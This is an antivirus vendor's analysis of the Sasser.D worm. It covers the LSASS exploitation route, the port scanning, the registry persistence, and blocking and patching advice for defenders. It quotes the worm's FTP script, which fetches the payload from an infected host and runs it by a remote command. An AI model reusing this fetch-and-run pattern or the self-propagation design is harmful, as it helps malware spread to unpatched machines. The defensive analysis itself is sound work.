W32/Sasser.D!worm
Analysis
Specifics
This 32-bit virus is a minor variant of W32/Sasser.C-net
- it also has a packed file size of 16,384 bytes and
was coded using Visual C++. The main difference in this
variant and the rest of the family is lack of support
on Windows 2000 will limit the spread of this variant
to only Windows XP systems.
The only intention of this virus is to spread to other systems across the Internet, and quickly. This threat takes advantage of a vulnerability of a buffer overflow in Local Security Authority Subsystem Service (LSASS) [ref: MS04-011, CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus will bind with TCP port 5554 and act as an FTP server. The virus will then send SYN packets to random IP addresses across the Internet to destination TCP port 445. IP addresses which are live will respond with an "ACK" packet. The virus will then target that IP address by initiating its LSASS exploit code in an effort to gain access to that system. If the target can be compromised, the virus will write into the IPC$ share an FTP script file which will request the virus from the infected system. The virus is downloaded from the infected system from TCP port 5554 to the target. The file received will then be executed, and the cycle will continue.
Loading At Windows Startup
If this virus is run, it will copy itself to the Windows
folder and register itself to run at each Windows startup
-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
"skynetave.exe" = C:\WINNT\skynetave.exe
The virus is also referenced by the Mutex "Jobaka3".
Virus Delivery Through FTP
On an infected system, the virus may write files with
random names, but a specific format into the System32
folder, such as these -
98723_up.exe
23712_up.exe
56919_up.exe
The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates a file "c:\win2.log" and writes the infected system IP address into this file. If the virus is able to compromise a target, it will open a remote shell on the target on TCP port 9995. Next the virus will write an FTP script file as "cmd.ftp" with the following instructions -
open undefinedIP Address
of infected systemundefined 5554
anonymous
user
bin
get #####_up.exe
bye
In the above instructions, ##### represents the actual
file name which is stored on the infected host. The
virus remotely executes the FTP script using the instruction
"ftp -s:cmd.ftp". When the file is retrieved
to the target system, it is then executed and the "cmd.ftp"
script is then deleted.
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block internal to external
traffic using UDP ports 135, 137, 138, and 445, and
TCP ports 135, 139, 445, 593, 5554 and 9995
- For Windows XP users, implement use of Personal
Firewall - this feature automatically blocks unsolicited
inbound traffic and would protect against this Internet
worm
- Ensure affected systems are updated with the latest
Microsoft security patches, and specifically the
update which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
FortiClient | |
---|---|
Extreme | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |